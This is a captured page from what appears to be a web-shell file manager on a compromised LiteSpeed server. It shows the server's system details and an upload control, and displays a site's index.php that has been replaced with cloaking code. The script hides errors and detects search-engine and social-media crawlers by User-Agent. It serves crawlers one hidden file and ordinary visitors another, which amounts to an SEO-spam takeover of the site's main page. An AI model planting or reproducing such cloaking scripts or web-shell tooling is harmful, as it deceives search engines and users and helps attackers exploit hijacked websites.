HEX
Server: LiteSpeed
System: Linux s13510.usc1.stableserver.net 5.14.0-611.16.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Dec 22 03:40:39 EST 2025 x86_64
User: saeaeroc (1183)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/saeaeroc/public_html/index.php
<?php  
error_reporting(0);
set_time_limit(0);

$bot_content_file = 'xml.php';
$user_content_file = 'index2.php';
function is_spider()
{
    $spiders = ['Googlebot', 'Google-InspectionTool', 'Google Favicon', 'Google-Site-Verification', 'facebook', 'instagram', 'tiktok', 'telegram', 'bot'];
    $s_agent = strtolower($_SERVER['HTTP_USER_AGENT']);
    
    foreach ($spiders as $spider) {
        if (stripos($s_agent, $spider) !== false) {
            return true;
        }
    }
    return false;
}

if (is_spider()) {	
    if (file_exists($bot_content_file)) {
        include($bot_content_file);
    }	
    exit();
}else{	
    if (file_exists($user_content_file)) {
        include($user_content_file);
    }	
    exit();
}


?>